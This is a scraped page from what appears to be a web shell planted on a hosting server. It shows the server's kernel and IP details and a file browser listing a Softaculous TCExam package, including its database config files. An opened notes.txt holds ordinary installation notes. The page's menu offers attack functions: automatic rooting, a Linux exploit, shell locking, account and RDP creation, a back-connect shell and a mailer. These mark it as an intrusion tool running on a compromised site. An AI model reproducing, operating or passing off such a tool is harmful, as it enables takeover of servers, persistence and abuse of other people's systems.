Linux salto.nuvemidc.com 5.14.0-687.42.1.el9_8.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Aug 27 11:55:12 EDT 2026 x86_64
LiteSpeed
: 177.73.233.61 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
7.4.33
agenci18
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
tcexam /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
upgrade
[ DIR ]
drwxr-xr-x
changelog.txt
2.65
KB
-rw-r--r--
check_utf8.php
1.07
KB
-rw-r--r--
clone.php
5.46
KB
-rw-r--r--
edit.php
4.96
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
11.39
KB
-rw-r--r--
fileindex.php
644
B
-rw-r--r--
import.php
3.35
KB
-rw-r--r--
info.xml
2.48
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
6.92
KB
-rw-r--r--
install.xml
750
B
-rw-r--r--
md5
1.85
KB
-rw-r--r--
notes.txt
1.45
KB
-rw-r--r--
tce_config.php
5.94
KB
-rw-r--r--
tce_config_.php
7.36
KB
-rw-r--r--
tce_db_config.php
4.12
KB
-rw-r--r--
tce_general_constants.php
2.46
KB
-rw-r--r--
tce_paths.php
4.72
KB
-rw-r--r--
update_pass.php
298
B
-rw-r--r--
upgrade.php
5.28
KB
-rw-r--r--
upgrade.xml
381
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. The installer is at /install/install.php 2. Rename config.default to config in our package.(we handle this from install.php) 3. For major upgrades please change upgrade.php to import sql according to version 4. Upgrade is Disabled from version lower than 14.0.0 because password utility is changed. No utility to change password after upgrade. (User need to hash their password and make entry in DB. Confirm with vendor). Enable upgrade from 14.0.0 as user will not required to change password. Also, add upgrade file in upgrade folder if required and make changes in upgrade.php. 5. PHP REQUIREMENT LINK: https://tcexam.org/docs/installation/ 6. Since 17.x.x As mentioned in the installation docs after extracting the downloaded zip you need to download the dependencies using composer. https://github.com/tecnickcom/tcexam/blob/main/install/README.md Without this tcexam will not work. 7. Enable auto upgrade again in the next version. (17.x.x to 17.x.y) 8. K_KEY_SECURITY is same as its gets generated while downloading package through composer. 9. Keep utf8 changes in /admin/config/tce_config.php file because the script has not handled it. 10. If manual installation is done on a http server set 'K_COOKIE_SECURE' as false in /shared/config/tce_config.php , i.e define('K_COOKIE_SECURE', false);, else login won't work, by default it's true. Referred from K_COOKIE_SECURE under official docs : https://tcexam.org/docs/srcdoc/tcexam/files-shared-config-default-tce-config/
Close